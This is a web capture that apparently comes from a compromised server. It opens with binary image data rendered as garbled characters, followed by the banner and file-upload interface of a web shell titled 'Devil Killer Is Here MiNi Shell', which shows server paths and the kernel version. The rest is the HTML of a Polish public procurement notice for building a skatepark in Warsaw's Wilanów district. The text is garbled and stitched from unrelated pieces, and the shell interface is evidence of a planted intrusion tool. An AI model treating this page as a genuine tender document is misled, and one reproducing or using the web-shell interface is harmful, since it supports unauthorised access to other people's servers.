JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220124/0003198701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Realizacja obiektu małej architektury - skateparku wraz z niezbędną infrastrukturą techniczną na terenie Dzielnicy Wilanów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dzielnica Wilanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Franciszka Klimczaka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wilanow.zzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wilanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja obiektu małej architektury - skateparku wraz z niezbędną infrastrukturą techniczną na terenie Dzielnicy Wilanów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cb8afbf0-7ac2-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00031987</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000252/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 Zagospodarowanie terenów (BO) - zamówienie częściowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo-aplikacyjne do przekazania danych dotyczące systemu<br/>https://zamowienia.um.warszawa.pl:<br/>• stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google<br/>Chrome lub MS Edge;<br/>• włączona obsługa JavaScript;<br/>• zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf<br/>Format kodowania i oznaczania czasu:<br/>• plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert;<br/>• oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem<br/>Głównego Urzędu Miar.<br/>Wymagania sprzętowo-aplikacyjne w zakresie podpisywania ofert:<br/>W przypadku składania oferty w formie elektronicznej (podpisywania dokumentów kwalifikowanym<br/>podpisem elektronicznym), Wykonawca musi posiadać:<br/>• Kwalifikowany podpis elektroniczny osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce obsługa JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK) • Zainstalowana aplikacja Szafir Host<br/>• Podłączony lub wbudowany w komputer czytnik kart podpisu elektronicznego. Prawidłowość<br/>zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace, po kliknięciu<br/>przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów podpisem<br/>osobistym), wykonawca musi posiadać:<br/>E-dowód osobisty osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce opcja obsługi JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host;<br/>• Zainstalowane oprogramowanie do obsługi e-dowodu E-dowód menadżer dostępne na stronie<br/>https://www.gov.pl/web/e-dowod;<br/>• Podłączony lub wbudowany w komputer czytnik karty e-dowód.<br/>Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace,<br/>po kliknięciu przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów profilem zaufanym),<br/>wykonawca musi posiadać:<br/>• Profil zaufany osoby składającej ofertę w Systemie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Kto administruje danymi?<br/>• Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie m.st. Warszawy jest<br/>Prezydent m.st. Warszawy, z siedzibą w Warszawie, Pl. Bankowy 3/5.<br/>• Na pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych, a także o przysługujące<br/>prawa odpowie Inspektor Ochrony Danych w Urzędzie m.st. Warszawy. Proszę je wysłać na adres:<br/>iod@um.warszawa.pl.<br/>Dlaczego moje dane są przetwarzane?<br/>1) Wynika to bezpośrednio z konkretnego przepisu prawa, tj. ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych oraz aktów wykonawczych do niej wydanych; ustawy z dnia 10 maja 2018 r. o<br/>ochronie danych osobowych, Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/678 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu tych danych, ustawy z dnia 27 sierpnia 2009 r. o<br/>finansach publicznych, ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z<br/>dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach lub jest niezbędne do wykonania<br/>zadania w interesie publicznym albo w ramach sprawowania władzy publicznej.<br/>2) Pani/Pana dane osobowe przetwarzane są w celu: ubiegania się o udzielenie zamówienia<br/>publicznego.<br/>3) Podanie przez Panią/Pana danych osobowych jest obowiązkowe. Jeśli Pani/Pan tego nie zrobi, nie<br/>będziemy mogli zrealizować Pana/Pani sprawy .<br/>Jak długo będą przechowywane moje dane?<br/>1. Pani/Pana dane osobowe będą przechowywane przez czas wymagany przepisami prawa, tj. przez<br/>okres wynikający z przepisów ustawy Prawo zamówień publicznych, tj. okres niezbędny do realizacji<br/>celu/celów określonych powyżej, a po tym czasie przez okres oraz w zakresie wymaganym przez<br/>przepisy powszechnie obowiązującego prawa.<br/>Potem dokumenty trafią do archiwum zakładowego.<br/>Kto może mieć dostęp do moich danych?<br/>Odbiorcami Pani/Pana danych osobowych mogą być:<br/>a) podmioty, którym Administrator powierzy przetwarzanie danych osobowych,<br/>w szczególności:<br/>1) podmioty świadczące dla Urzędu m.st. Warszawy usługi informatyczne, pocztowe;<br/>2) każdy zainteresowany odbiorca - informacje o Wykonawcach są jawne na podstawie ustawy Pzp oraz ustawy o dostępie do informacji publicznej;<br/>3) podmiot Platforma Aukcyjna Marketplanet;<br/>4) podmioty upoważnione na podstawie przepisów prawa;<br/>b) organy publiczne i inne podmioty, którym Administrator udostępni dane osobowe na podstawie<br/>przepisów prawa.<br/>Jakie mam prawa w związku z przetwarzaniem moich danych?<br/>• Ma Pani/Pan prawo do:<br/>1. dostępu do danych osobowych;<br/>2. żądania sprostowania danych osobowych;<br/>3. żądania usunięcia danych osobowych, w przypadku gdy:<br/>• dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób przetwarzane;<br/>• nie ma podstawy prawnej do przetwarzania Pani/Pana danych osobowych;<br/>• wniosła Pani/Pan sprzeciw wobec przetwarzania i nie występują nadrzędne prawnie uzasadnione<br/>podstawy przetwarzania;<br/>• Pani/Pana dane przetwarzane są niezgodnie z prawem;<br/>• Pani/Pana dane muszą być usunięte, by wywiązać się z obowiązku wynikającego z przepisów prawa.<br/>4. żądania ograniczenia przetwarzania danych osobowych;<br/>5. sprzeciwu wobec przetwarzania danych – w przypadku, gdy łącznie spełnione są następujące<br/>przesłanki:<br/>a. zaistnieją przyczyny związane z Pani/Pana szczególną sytuacją;<br/>b. dane przetwarzane są w celu wykonania zadania realizowanego w interesie publicznym lub w<br/>ramach sprawowania władzy publicznej powierzonej Administratorowi, z wyjątkiem sytuacji, w której<br/>Administrator wykaże istnienie ważnych prawnie uzasadnionych podstaw do przetwarzanie danych<br/>osobowych, nadrzędnych wobec interesów, praw i wolności osoby, której dane dotyczą, lub podstaw<br/>do ustalenia, dochodzenia lub obrony roszczeń;<br/>6. Wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku powzięcia<br/>informacji o niezgodnym z prawem przetwarzaniu w Urzędzie m.st. Warszawy Pani/Pana danych<br/>osobowych.<br/>• Nie przysługuje Pani/Panu prawo do przenoszenia danych</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1, ze zm. 3) ), zwanego dalej „rozporządzeniem 2016/679”, w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy z dnia 11 września 2019<br/>r. Prawo zamówień publicznych, do upływu terminu do ich wniesienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/WIR/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja obiektu małej architektury - skateparku wraz z<br/>niezbędną infrastrukturą techniczną na działce nr ew. 95 z obrębu 1-10-25 zlokalizowanej na<br/>terenie Dzielnicy Wilanów w Warszawie opisanego dokumentacją projektową. Dostępność dla<br/>osób niepełnosprawnych na podstawie Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia<br/>2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie<br/>Dz.U.2019.1065 t.j. z dnia 07.06.2019 r.<br/>Roboty budowlane winny być zrealizowane zgodnie z zasadami sztuki budowlanej i wiedzy<br/>technicznej przy zastosowaniu obowiązujących przepisów, norm i specyfikacji technicznych<br/>wykonania i odbioru robót, w oparciu o dokumenty zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">186 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzony okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/>2. Na potwierdzenie spełnienia warunku udziału Wykonawca wykaże, że:<br/>2.A. w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres<br/>prowadzenia jest krótszy – w tym okresie), wykonał w sposób należyty co najmniej dwie roboty<br/>budowlane o wartości każdej z robót wynoszącej co najmniej 600.000,00 zł brutto, polegające na<br/>budowie skateparku o konstrukcji żelbetowej monolitycznej z wykorzystaniem prefabrykowanych<br/>urządzeń jezdnych.<br/>W przypadku, jeżeli wartość zamówienia wyrażona została w umowie w walucie innej niż polski<br/>złoty – równowartość tej kwoty w złotych brutto wg średniego kursu złotego w stosunku do walut<br/>obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na dzień opublikowania<br/>ogłoszenia o zamówieniu.<br/>- Warunek określony w III.B.2.2.A. SWZ musi być spełniony w całości przez co najmniej jednego<br/>z Wykonawców wspólnie ubiegających się o zamówienie (jeden lub każdy z podmiotów musi<br/>posiadać samodzielnie wymagane doświadczenie, nie podlega łączeniu doświadczenie w<br/>wykonaniu robót Wykonawców wspólnie ubiegających się o zamówienie).<br/>- W przypadku Wykonawców polegających na zasobach podmiotów, na zasadach określonych<br/>w art. 118 ust. 1 ustawy - Podmiot, na zasobach którego polega Wykonawca, na zasadach<br/>określonych w art. 118 ust. 1 ustawy, musi wykazać samodzielnie, że spełnia warunek określony<br/>w III.B.2.2.A. SWZ.<br/>2.B. w trakcie realizacji zamówienia dysponować będą, na potrzeby jego prawidłowej realizacji,<br/>przynajmniej jedną osobą, która pełnić będzie funkcję kierownika budowy, posiadającą<br/>uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń uprawniające<br/>do kierowania robotami budowlanymi, ponadto wskazana osoba winna posiadać co najmniej 5-<br/>letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy.<br/>- Warunek określony w III.B.2.2.B. SWZ musi być spełniony przez co najmniej jednego z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>- W przypadku Wykonawców polegających na zasobach podmiotów, na zasadach określonych<br/>w art. 118 ust. 1 ustawy - Podmiot, na zasobach którego polega Wykonawca, na zasadach<br/>określonych w art. 118 ust. 1 ustawy, musi wykazać, że spełnia warunek określony w III.B.2.2.B. SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Potwierdzenie aktualności informacji zawartych w oświadczeniach o braku podstaw do wykluczenia -<br/>wg wzoru stanowiącego Załącznik nr 10 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; w zakresie wymaganym w punkcie III.B.2 SWZ – wykaz robót stanowi załącznik nr 8 do SWZ.<br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych , uprawnień, doświadczenia – wykaz robót stanowi załącznik nr 11 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga w niniejszym postepowaniu złożenia w Systemie wypełnionego<br/>formularza oferty o treści zgodnej z założeniami SWZ.<br/>2) Ponadto wraz z ofertą należy złożyć:<br/>a) (jeżeli dotyczy) aktualne na dzień składania ofert oświadczenie wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane lub usługi,<br/>wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy), o treści zgodnej ze wzorem<br/>stanowiącym Załącznik nr 2 do SWZ.<br/>b) (jeżeli dotyczy) aktualne na dzień składania ofert oświadczenie o podstawach wykluczenia w<br/>zw. z art. 110 ust. 2 ustawy o treści zgodnej ze wzorem stanowiącym Załącznik nr 4 do SWZ.<br/>c) dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. pełnomocnictwo,<br/>odpis z właściwego rejestru, np. Krajowego Rejestru Sądowego, informacja o 